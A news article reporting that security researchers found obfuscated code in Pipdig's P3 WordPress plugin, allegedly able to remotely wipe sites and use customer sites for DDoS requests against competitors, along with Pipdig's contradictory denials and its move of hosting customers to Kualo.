Maksim Kabakou – Fotolia
Security researchers found evidence that a Pipdig WordPress plugin contained suspicious code. Although Pipdig denied any wrongdoing, the company removed the questionable code from its plugin and repositories.
Pipdig makes custom themes for WordPress and Blogger, as well as the Pipdig Power Pack (P3) WordPress plugin, which is installed by default along with any WordPress theme. Suspicious code — some of which was obfuscated — found in the Pipdig WordPress plugin pointed to Pipdig being able to remotely reset customer blogs, change passwords or launch distributed denial-of-service (DDoS) attacks on competing sites.
The suspicious code was first reported by Mikey Veenstra, threat analyst at Wordfence, a WordPress security company, and Jem Turner, an independent developer, who conducted independent parallel investigations into Pipdig.
According to both reports, the P3 plugin contained code that uses Pipdig customer sites to issue hourly requests to Pipdig competitors’ sites in an effort to stage low-level DDoS attacks.
Pipdig responded by denying any malicious activity and providing rationales for the plugin having the access it did, but also quietly removed the suspicious code from both the plugin and the company’s code repositories. Veenstra followed up his initial report with more evidence that not only supported his claims, but showed direct contradictions in the Pipdig response.
The starkest contradiction was in Pipdig’s response to the accusation of a kill switch being available to reset a user’s blog.
In Pipdig’s original response posted on March 29, the company said, “There is a function in the plugin which can be used to clear database tables, much like a backup or standard reset plugin. To confirm, we do not have the ability to ‘kill’ a site, nor would we ever, ever want to do that!”
In the follow-up response posted on March 31, Pipdig again asserted the functionality was not a kill switch. But the company admitted “there was function in an older version of the plugin which could be used to reset a site back to the default settings.” Additionally, it implied the functionality was added as a result of an incident in July 2018, where Pipdig WordPress themes were stolen and resold illegally and used to reset those unauthorized sites.
However, Veenstra noted some discrepancies, the first of which is that there is no difference between a WordPress site reset to default and one that has been destroyed completely.
“Second, any honest plugin developer providing a legitimate means for a user to destroy their own database (whether that’s a good idea or not is a different story) would leave that choice strictly to the user. Instead of offering a user-facing button surrounded by ‘Are you sure you want to delete this entire database?’ warnings, the P3 plugin silently asks their servers once every hour if the database should be vaporized,” Veenstra wrote in a blog post. “Third, this answer conflicts with the previous one. Is this code for anti-piracy or for a ‘factory reset’? Has it ever been used or not?”
Veenstra said the original commit adding this reset functionality to the P3 plugin was added on Nov. 7, 2017, and was still part of the plugin as of March 25, 2019 — three days before Wordfence notified Pipdig of the issues.
Veenstra noted that he reached out to Pipdig at 12:29 p.m. on March 28, and by 2:30 p.m., most of the offending code was removed from the plugin, although the change log for this new version 4.8.0 was altered to appear as though it was released on March 24. Turner kept a copy of version 4.7.3 of the Pipdig WordPress plugin to verify claims. Additionally, Pipdig removed all code from its public Bitbucket repository on March 31.
Veenstra also found evidence the Pipdig Blogger plugin included obfuscated code similar to the Pipdig WordPress plugin, which would run DDoS attacks on competitors. Pipdig denied any DDoS attacks and claimed the code in question “is used to pass the theme’s license key to an external server.”
According to Veenstra, “None of this statement aligns with the actual behavior of the code.”
When Pipdig was contacted for comment, especially on the use of obfuscated code to hide some of this functionality, the company refused to comment and only pointed to its existing blog post, which does not mention obfuscated code.
We obtained a Pipdig support email from Phil Clothier, creative director at Pipdig, informing customers that the company was shutting down its hosting service for WordPress sites because of a “wave of support requests” following the security reports that Pipdig was unable to adequately address. Clothier wrote that Pipdig has arranged to transfer all customer sites to Kualo Ltd., a London-based hosting provider, and apologized for the inconveniences.
“To anyone which we have lost trust with, I deeply apologize for any stress/concern this has caused you,” Clothier wrote. “We will work hard to regain that trust and hopefully we can see you again in future when there is more clarity on events.”
Kualo, however, said via Twitter that Pipdig’s email was “a very premature announcement” and promised to provide more details on the arrangement in the near future.
Nicky Bloor, director of U.K.-based Cognitous Cyber Security, tweeted some of his own investigation into the Pipdig WordPress plugin and noted that Kualo has already begun to disable what it called “suspicous code” being run by Pipdig while Kualo investigates further.
Steps in DNS server troubleshooting include checking the DNS status, looking at zone configurations and evaluating logs. Follow …
‘Emerging Green Technologies’ details how technology is a flexible tool organizations can use to make business operations more …
In this Q&A, ‘Emerging Green Technologies’ author Matthew N. O. Sadiku discusses the importance of going green and how to make …
The Inflation Reduction Act increases incentives for clean energy, but there is concern that it doesn’t address existing …
The ADPPA passed the U.S. House Committee on Energy and Commerce in July, making it farther than other recently introduced data …
The end of Amazon Care and acquisition of One Medical means Amazon is turning from employee health to direct to consumer.
Businesses have delayed and reduced their desktop and laptop orders from HP and Dell, executives reported. The PC market has …
The shift to Chromium has improved several aspects of Microsoft’s Edge browser — from privacy settings to reliability.
Whether organizations automate their log monitoring within Windows desktops or inspect them manually, logs can offer IT …
VMware plans to change products, strategic direction and marketing to keep up with customers rushing to deploy multi-cloud …
IBM and VMware expanded their long-held partnership with a deal to provide hybrid cloud services and consulting to IT pros in …
Updates to VMware’s flagship vSphere and vSAN software keep pace with enterprise interest in hybrid cloud infrastructure for …
UK GDP will increase when its ageing payments infrastructure is replaced with the latest technology to enable real-time payments
Acquisition of full-fibre ISP described as marking a meeting of minds at a time when gigabit broadband consumers deserve more …
Paul Simos, VMware’s managing director and vice-president for Southeast Asia and Korea, dives deeper into the company’s cloud …
All Rights Reserved, Copyright 2000 – 2022, TechTarget

Affiliate Marketing As A Business

Privacy Policy
Cookie Preferences
Do Not Sell My Personal Info


/ Uncategorized

Leave a Reply

Your email address will not be published. Required fields are marked *